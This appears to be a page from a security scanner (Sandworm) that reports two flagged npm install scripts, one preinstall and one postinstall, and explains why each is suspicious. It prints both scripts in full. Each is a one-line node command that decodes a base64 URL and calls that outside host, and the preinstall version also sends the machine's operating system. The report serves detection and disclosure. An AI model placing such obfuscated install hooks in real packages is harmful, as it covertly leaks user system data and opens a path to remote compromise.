Sandworm scans all new npm package versions for malicious install scripts.
Scanning since October 2024.
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: View on npm
This script sends an HTTP request to a potentially malicious URL that is constructed from a base64-encoded string. The URL includes information about the operating system, which could be used by an attacker to exploit vulnerabilities specific to that OS. This behavior can lead to further attacks or data leakage.
Install script: node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"
Detected Date: 13 Mar 2025
Affected Install Script: postinstall
Package Source: View on npm
The script makes an HTTPS request to a URL decoded from a base64-encoded string, without any user interaction or permission. This can potentially be used to download and execute malicious code or to communicate with a remote server in a way that could compromise system security.
Install script: node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"